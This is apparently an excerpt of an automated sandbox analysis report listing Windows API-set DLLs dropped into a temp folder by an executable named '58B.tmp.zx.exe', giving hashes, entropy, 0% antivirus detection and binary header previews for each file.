                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......Gg....`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22296
                                                                                                                                                                                                                        Entropy (8bit):7.054401722955359
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:WOMw3zdp3bwjGjue9/0jCRrndbkWEhWE6yQpBj0HRN7LFQHRN7l8pUclXr:WOMwBprwjGjue9/0jCRrndby/qWLF8l4
                                                                                                                                                                                                                        MD5:1D75E7B9F68C23A195D408CF02248119
                                                                                                                                                                                                                        SHA1:62179FC9A949D238BB221D7C2F71BA7C1680184C
                                                                                                                                                                                                                        SHA-256:67EBE168B7019627D68064043680674F9782FDA7E30258748B29412C2B3D4C6B
                                                                                                                                                                                                                        SHA-512:C2EE84A9AEAC34F7B51426D12F87BB35D8C3238BB26A6E14F412EA485E5BD3B8FB5B1231323D4B089CF69D8180A38DDD7FD593CC52CBDF250125AD02D66EEA9D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......U.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.0496932942785735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:/qWEhW8nhLvQpBj0HRN78riQHRN7TaSIlexO:ADhLvqWR8W6s
                                                                                                                                                                                                                        MD5:623283471B12F1BDB83E25DBAFAF9C16
                                                                                                                                                                                                                        SHA1:ECBBA66F4DCA89A3FAA3E242E30AEFAC8DE02153
                                                                                                                                                                                                                        SHA-256:9CA500775FEE9FF69B960D65040B8DC415A2EFDE2982A9251EE6A3E8DE625BC7
                                                                                                                                                                                                                        SHA-512:54B69FFA2C263BE4DDADCA62FA2867FEA6148949D64C2634745DB3DCBC1BA0ECF7167F02FA53EFD69EAAEE81D617D914F370F26CA16EE5850853F70C69E9A61F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...l............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.110045595478065
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:nWEhWC5oQpBj0HRN7EODQHRN7nvp1x09lgefv:nNaqWEo8nvpsH
                                                                                                                                                                                                                        MD5:61F70F2D1E3F22E976053DF5F3D8ECB7
                                                                                                                                                                                                                        SHA1:7D224B7F404CDE960E6B7A1C449B41050C8E9C58
                                                                                                                                                                                                                        SHA-256:2695761B010D22FDFDA2B5E73CF0AC7328CCC62B4B28101D5C10155DD9A48020
                                                                                                                                                                                                                        SHA-512:1DDC568590E9954DB198F102BE99EABB4133B49E9F3B464F2FC7F31CC77D06D5A7132152F4B331332C42F241562EE6C7BF1C2D68E546DB3F59AB47EAF83A22CF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......S.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20760
                                                                                                                                                                                                                        Entropy (8bit):7.026463196608447
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:UWWEhWsxlQpBj0HRN7l1khQHRN7kTPSIlexA:1DqWl1kh8kL62
                                                                                                                                                                                                                        MD5:1322690996CF4B2B7275A7950BAD9856
                                                                                                                                                                                                                        SHA1:502E05ED81E3629EA3ED26EE84A4E7C07F663735
                                                                                                                                                                                                                        SHA-256:5660030EE4C18B1610FB9F46E66F44D3FC1CF714ECCE235525F08F627B3738D7
                                                                                                                                                                                                                        SHA-512:7EDC06BFA9E633351291B449B283659E5DD9E706DD57ADE354BCE3AF55DF4842491AF27C7721B2ACC6948078BDFC8E9736FEC46E0641AF368D419C7ED6AEBD44
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......G.....`.........................................`...G............ ...................A..............8............................................................................rdata..h...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21784
                                                                                                                                                                                                                        Entropy (8bit):7.053725357941814
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:5WXk1JzNcKSImWEhW1qEQpBj0HRN77S4QHRN7j8AXOVlTHxE:5bcKSdkHqW+48j/cE
                                                                                                                                                                                                                        MD5:95612A8A419C61480B670D6767E72D09
                                                                                                                                                                                                                        SHA1:3B94D1745AFF6AAFEFF87FED7F23E45473F9AFC9
                                                                                                                                                                                                                        SHA-256:6781071119D66757EFA996317167904697216AD72D7C031AF4337138A61258D4
                                                                                                                                                                                                                        SHA-512:570F15C2C5AA599332DD4CFB3C90DA0DD565CA9053ECF1C2C05316A7F623615DD153497E93B38DF94971C8ABF2E25BC1AAAF3311F1CDA432F2670B32C767012A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.060875826104053
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:iDfIeAWEhWY6yQpBj0HRN7wHQHRN7NjZSIlexL:NemTqWC8NV6d
                                                                                                                                                                                                                        MD5:D6AD0F2652460F428C0E8FC40B6F6115
                                                                                                                                                                                                                        SHA1:1A5152871ABC5CF3D4868A218DE665105563775E
                                                                                                                                                                                                                        SHA-256:4EF09FA6510EEEBB4855B6F197B20A7A27B56368C63CC8A3D1014FA4231AB93A
                                                                                                                                                                                                                        SHA-512:CEAFEEE932919BC002B111D6D67B7C249C85D30DA35DFBCEBD1F37DB51E506AC161E4EE047FF8F7BF0D08DA6A7F8B97E802224920BD058F8E790E6FA0EE48B22
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......@!....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19224
                                                                                                                                                                                                                        Entropy (8bit):7.1376464003004685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:tnjFPWEhWcCTQW65FdQpBjSdHnhWgN7a8Wc//W65FdQHnhWgN7a8WOR5mzVEMqnL:tnhWEhWnqQpBj0HRN7hQHRN7mCMll5i
                                                                                                                                                                                                                        MD5:654D95515AB099639F2739685CB35977
                                                                                                                                                                                                                        SHA1:9951854A5CF407051CE6CD44767BFD9BD5C4B0CC
                                                                                                                                                                                                                        SHA-256:C4868E4CEBDF86126377A45BD829D88449B4AA031C9B1C05EDC47D6D395949D4
                                                                                                                                                                                                                        SHA-512:9C9DD64A3AD1136BA62CCA14FC27574FAAEBC3DE1E371A86B83599260424A966DFD813991A5EF0B2342E0401CB99CE83CD82C19FCAE73C7DECDB92BAC1FB58A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......N.....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.038577027863076
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:QGeVdWEhWF4+QpBj0HRN7nKQHRN7KFcR8pUclXi:QGeVFp+qWK8AG8pUh
                                                                                                                                                                                                                        MD5:E6B7681CCC718DDB69C48ABE8709FDD6
                                                                                                                                                                                                                        SHA1:A518B705746B2C6276F56A2F1C996360B837D548
                                                                                                                                                                                                                        SHA-256:4B532729988224FE5D98056CD94FC3E8B4BA496519F461EF5D9D0FF9D9402D4B
                                                                                                                                                                                                                        SHA-512:89B20AFFAA23E674543F0F2E9B0A8B3ECD9A8A095E19D50E11C52CB205DAFDBF2672892FD35B1C45F16E78AE9B61525DE67DBE7673F8CA450AA8C42FEEAC0895
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......2....`.........................................`................ ...................A..............8............................................................................rdata..,...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.087741938037833
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:nyMvfWEhWtJ7QpBj0HRN7n0QHRN7gTtAXOVlTF2:nyMvPq7qWn08gWd
                                                                                                                                                                                                                        MD5:BCB412464F01467F1066E94085957F42
                                                                                                                                                                                                                        SHA1:716C11B5D759D59DBFEC116874E382D69F9A25B6
                                                                                                                                                                                                                        SHA-256:F040B6E07935B67599EA7E32859A3E93DB37FF4195B28B4451AD0D274DB6330E
                                                                                                                                                                                                                        SHA-512:79EC0C5EE21680843C8B7F22DA3155B7607D5BE269F8A51056CC5F060AD3A48CED3B6829117262ABA1A90E692374B59DDFE92105D14179F631EFC0C863BFDECB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......#j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21784
                                                                                                                                                                                                                        Entropy (8bit):7.005386895286503
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Ddv3V0dfpkXc0vVaEWEhWYYxnhLvQpBj0HRN7gPZGQHRN7xuHNiWXhlhOY3:Ddv3VqpkXc0vVaS5ahLvqWSA8sNizM
                                                                                                                                                                                                                        MD5:B98598657162DE8FBC1536568F1E5A4F
                                                                                                                                                                                                                        SHA1:F7C020220025101638FD690D86C53D895A03E53C
                                                                                                                                                                                                                        SHA-256:F596C72BE43DB3A722B7C7A0FD3A4D5AEA68267003986FBFD278702AF88EFA74
                                                                                                                                                                                                                        SHA-512:AD5F46A3F4F6E64A5DCB85C328F1B8DAEFA94FC33F59922328FDCFEDC04A8759F16A1A839027F74B7D7016406C20AC47569277620D6B909E09999021B669A0D6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...V............ ...................A..............8............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.091480115020503
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:ntZ3lWEhWFJ7QpBj0HRN7DdC8QHRN7cSIlexF:pa7qWDdC88c6H
                                                                                                                                                                                                                        MD5:B751571148923D943F828A1DEB459E24
                                                                                                                                                                                                                        SHA1:D4160404C2AA6AEAF3492738F5A6CE476A0584A6
                                                                                                                                                                                                                        SHA-256:B394B1142D060322048FB6A8AC6281E4576C0E37BE8DA772BC970F352DD22A20
                                                                                                                                                                                                                        SHA-512:26E252FF0C01E1E398EBDDCC5683A58CDD139161F2B63B65BDE6C3E943E85C0820B24486859C2C597AF6189DE38CA7FE6FA700975BE0650CB53C791CD2481C9D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0......?.....`.........................................`...v............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20760
                                                                                                                                                                                                                        Entropy (8bit):7.031246620579023
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:rB2WEhWC5oQpBj0HRN7xQHRN7sbSIlexe:rBs1aqWx8868
                                                                                                                                                                                                                        MD5:8AEA681E0E2B9ABBF73A924003247DBB
                                                                                                                                                                                                                        SHA1:5BAFC2E0A3906723F9B12834B054E6F44D7FF49F
                                                                                                                                                                                                                        SHA-256:286068A999FE179EE91B289360DD76E89365900B130A50E8651A9B7ECE80B36D
                                                                                                                                                                                                                        SHA-512:08C83A729036C94148D9A5CBC03647FA2ADEA4FBA1BBB514C06F85CA804EEFBF36C909CB6EDC1171DA8D4D5E4389E15E52571BAA6987D1F1353377F509E269AB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......5....`.........................................`...E............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.126809628880692
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:DPWEhWcG6SJxHW65FdQpBjSdHnhWgN7a8Wcb8W65FdQHnhWgN7a8Wbv8p2kacqnd:LWEhWP6yQpBj0HRN7reQHRN7c8pUclXM
                                                                                                                                                                                                                        MD5:EAB486E4719B916CAD05D64CD4E72E43
                                                                                                                                                                                                                        SHA1:876C256FB2AEB0B25A63C9EE87D79B7A3C157EAD
                                                                                                                                                                                                                        SHA-256:05FE96FAA8429992520451F4317FBCEBA1B17716FA2CAF44DDC92EDE88CE509D
                                                                                                                                                                                                                        SHA-512:C50C3E656CC28A2F4F6377BA24D126BDC248A3125DCA490994F8CACE0A4903E23346AE937BB5B0A333F7D39ECE42665AE44FDE2FD5600873489F3982151A0F5D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19736
                                                                                                                                                                                                                        Entropy (8bit):7.050436266578937
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:VPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8Wcx/YaWW65FdQHnhWgN7a8Wu08p2kacE:dWEhWxqEQpBj0HRN7FwQHRN7k8pUclXS
                                                                                                                                                                                                                        MD5:EDD61FF85D75794DC92877F793A2CEF6
                                                                                                                                                                                                                        SHA1:DE9F1738FC8BF2D19AA202E34512EC24C1CCB635
                                                                                                                                                                                                                        SHA-256:8ACA888849E9089A3A56FA867B16B071951693AB886843CFB61BD7A5B08A1ECE
                                                                                                                                                                                                                        SHA-512:6CEF9B256CDCA1A401971CA5706ADF395961B2D3407C1FFF23E6C16F7E2CE6D85D946843A53532848FCC087C18009C08F651C6EB38112778A2B4B33E8C64796C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......k....`.........................................`...9............ ...................A..............8............................................................................rdata..L...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20760
                                                                                                                                                                                                                        Entropy (8bit):7.043213792651867
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:0N+WEhW+FQpBj0HRN7N7rJQHRN7YSIlexs:ZjqW1rJ8Y6e
                                                                                                                                                                                                                        MD5:22BFE210B767A667B0F3ED692A536E4E
                                                                                                                                                                                                                        SHA1:88E0FF9C141D8484B5E34EAAA5E4BE0B414B8ADF
                                                                                                                                                                                                                        SHA-256:F1A2499CC238E52D69C63A43D1E61847CF852173FE95C155056CFBD2CB76ABC3
                                                                                                                                                                                                                        SHA-512:CBEA3C690049A73B1A713A2183FF15D13B09982F8DD128546FD3DB264AF4252CCD390021DEE54435F06827450DA4BD388BD6FF11B084C0B43D50B181C928FD25
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......i....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23832
                                                                                                                                                                                                                        Entropy (8bit):6.893758159434215
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:ODyuWEhWjlQpBj0HRN7ubJlUQHRN7sXhlhOq:qMqWuzU8lq
                                                                                                                                                                                                                        MD5:DA5E087677C8EBBC0062EAC758DFED49
                                                                                                                                                                                                                        SHA1:CA69D48EFA07090ACB7AE7C1608F61E8D26D3985
                                                                                                                                                                                                                        SHA-256:08A43A53A66D8ACB2E107E6FC71213CEDD180363055A2DC5081FE5A837940DCE
                                                                                                                                                                                                                        SHA-512:6262E9A0808D8F64E5F2DFAD5242CD307E2F5EAA78F0A768F325E65C98DB056C312D79F0B3E63C74E364AF913A832C1D90F4604FE26CC5FB05F3A5A661B12573
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20248
                                                                                                                                                                                                                        Entropy (8bit):7.034562111482961
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:I8PWEhWck+4cW65FdQpBjSdHnhWgN7a8Wcl4zKW65FdQHnhWgN7a8W5kX5mzVEMq:9WEhWi4+QpBj0HRN71/QHRN7ckwCMllO
                                                                                                                                                                                                                        MD5:33A0FE1943C5A325F93679D6E9237FEE
                                                                                                                                                                                                                        SHA1:737D2537D602308FC022DBC0C29AA607BCDEC702
                                                                                                                                                                                                                        SHA-256:5AF7AA065FFDBF98D139246E198601BFDE025D11A6C878201F4B99876D6C7EAC
                                                                                                                                                                                                                        SHA-512:CAB7FCAA305A9ACE1F1CC7077B97526BEBC0921ADF23273E74CD42D7FE99401D4F7EDE8ECB9847B6734A13760B9EBE4DBD2465A3DB3139ED232DBEF68FB62C54
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
